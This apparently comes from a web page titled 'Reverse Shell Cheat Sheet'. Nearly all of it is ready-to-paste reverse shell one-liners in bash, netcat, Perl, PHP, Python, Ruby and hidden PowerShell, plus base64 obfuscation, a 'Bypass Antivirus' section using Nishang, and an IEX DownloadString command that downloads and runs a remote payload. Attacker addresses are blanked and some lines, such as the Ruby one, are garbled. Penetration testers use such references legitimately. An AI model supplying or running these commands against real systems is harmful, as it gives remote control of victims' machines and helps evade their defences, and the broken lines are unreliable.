Reverse Shell Cheat Sheet

Last modified: 2023-09-15

Privilege Escalation Reverse Shell Windows

First of all, we need to start a listener in local machine to get an incoming connection.

nc -lvnp 4444


bash -i >&  /dev/tcp/ 0>&1
bash -c 'bash -i >& /dev/tcp/ 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'

# For URL param

with Base64

Execute the following commands in target machine.

echo "bash -i >& /dev/tcp/ 0>&1" | base64
echo <base64_string> | base64 -d | bash

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f


ncat 4444 -e /bin/bash
ncat 4444 -e /bin/sh
ncat 4444 -c bash
ncat --udp 4444 -e /bin/bash

nc 4444 -e /bin/bash
nc 4444 -e /bin/sh
nc 4444 -c bash
nc --udp 4444 -e /bin/bash


perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");'


python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"])'


ruby -rsocket -e'"",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bypass Antivirus


Nishang is the Offensive PowerShell for red team, penetration testing and offensive security.

1. Preparing the Payload in Your Local Machine

First off, copy the payload to the current working directory.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following code to the final line in the payload (shell.ps1).

Invoke-PowerShellTcp -Reverse  -IPAddress <your-local-ip> -Port 4444

2. Opening Wev Server in Your Local Machine

To download the payload and execute the reverse shell in the target machine, open the web server in your local machine.

python3 -m http.server 8000

3. Downloading the Payload and Executing Reverse Shell

In the target machine, download the local-hosted payload and run reverse shell.

cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')